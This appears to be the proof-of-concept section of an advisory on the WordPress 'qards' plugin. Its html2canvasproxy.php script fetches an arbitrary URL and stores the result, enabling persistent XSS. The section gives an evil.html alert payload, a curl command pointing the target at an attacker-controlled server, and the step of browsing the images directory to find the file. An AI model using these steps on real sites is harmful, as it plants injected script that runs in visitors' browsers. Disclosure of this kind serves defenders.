|Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as following:
On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file, suffer from a persistent XSS vulnerability.
1. create a remote file (evil.html), on your webserver, with the following content:
<script> alert('XSS'); </script>
2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'
3. Browse to http://target/wp-content/plugins/qards/images/ to get the file